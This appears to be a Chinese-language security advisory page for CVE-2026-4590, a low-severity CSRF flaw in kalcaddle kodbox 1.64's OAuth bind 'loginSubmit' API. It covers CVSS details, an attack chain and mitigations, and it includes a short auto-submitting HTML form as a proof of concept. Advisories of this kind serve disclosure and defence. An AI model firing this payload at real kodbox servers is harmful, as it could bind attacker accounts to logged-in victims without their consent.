IPBUF安全漏洞报告
English
CVE-2026-4590 CVSS 3.1 低危

CVE-2026-4590 kalcaddle kodbox CSRF漏洞

披露日期: 2026-03-23
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-4590
漏洞类型
跨站请求伪造 (CSRF)
CVSS评分
3.1 低危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
kalcaddle kodbox

相关标签

CSRFkodboxkalcaddle跨站请求伪造Web安全

漏洞概述

kalcaddle kodbox 1.64版本被发现存在安全漏洞,该漏洞源于组件loginSubmit API中未知函数对参数处理不当。受影响的文件路径为/workspace/source-code/plugins/oauth/controller/bind/index.class.php。攻击者通过操纵third参数,可诱导用户执行非预期的跨站请求伪造攻击。虽然攻击复杂度较高且需要用户交互,但利用代码已公开,可能导致数据完整性受损。

技术细节

该漏洞位于kalcaddle kodbox 1.64的OAuth绑定控制器中,具体涉及`/workspace/source-code/plugins/oauth/controller/bind/index.class.php`文件的`loginSubmit`接口。系统未对`third`参数进行严格的CSRF令牌验证或来源检查,允许攻击者构造恶意请求。根据CVSS 3.1向量,攻击通过网络(AV:N)进行,无需特权(PR:N),但需要用户交互(UI:R)。成功利用后,攻击者可利用受害者的身份状态修改应用数据,造成低程度的完整性影响(I:L),但不会直接影响机密性(C:N)或可用性(A:N)。由于利用难度较高,实际攻击需配合社会工程学手段。

攻击链分析

STEP 1
侦察
攻击者确认目标系统使用的是存在漏洞的kalcaddle kodbox 1.64版本。
STEP 2
构造攻击载荷
攻击者构建包含恶意HTML页面的链接,该页面向loginSubmit API发送POST请求,并篡改third参数。
STEP 3
社会工程学诱导
攻击者诱导已登录的受害者点击恶意链接或访问包含攻击脚本的网站。
STEP 4
执行请求
受害者的浏览器在不知情的情况下,携带有效的会话Cookie向服务器发送伪造的请求。
STEP 5
达成影响
服务器处理该请求,导致系统状态被非授权修改(如绑定恶意OAuth账号),影响数据完整性。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for CVE-2026-4590 Target: kalcaddle kodbox 1.64 loginSubmit API Description: CSRF exploit via 'third' parameter manipulation --> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://target-url/workspace/source-code/plugins/oauth/controller/bind/index.class.php" method="POST"> <input type="hidden" name="api" value="loginSubmit" /> <input type="hidden" name="third" value="attacker_controlled_value" /> <input type="submit" value="Submit Request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

影响范围

kalcaddle kodbox 1.64

防御指南

临时缓解措施
建议暂时禁用受影响的OAuth绑定功能,或通过WAF(Web应用防火墙)添加规则,阻断对特定参数的异常请求。同时,应加强用户对未知链接的警惕性教育。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表